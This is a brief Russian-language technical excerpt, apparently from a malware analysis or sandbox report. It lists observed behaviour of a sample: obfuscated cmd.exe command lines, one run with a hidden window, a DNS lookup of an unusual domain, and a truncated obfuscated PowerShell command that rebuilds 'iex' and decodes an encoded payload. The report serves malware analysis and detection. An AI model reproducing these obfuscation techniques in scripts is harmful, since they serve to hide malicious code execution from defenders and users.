Техническая информация
- '<SYSTEM32>\cmd.exe' apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPF...
- DNS ASK id#######sfhasdbwejeasdh.com
- '<SYSTEM32>\cmd.exe' apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPF...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f042341...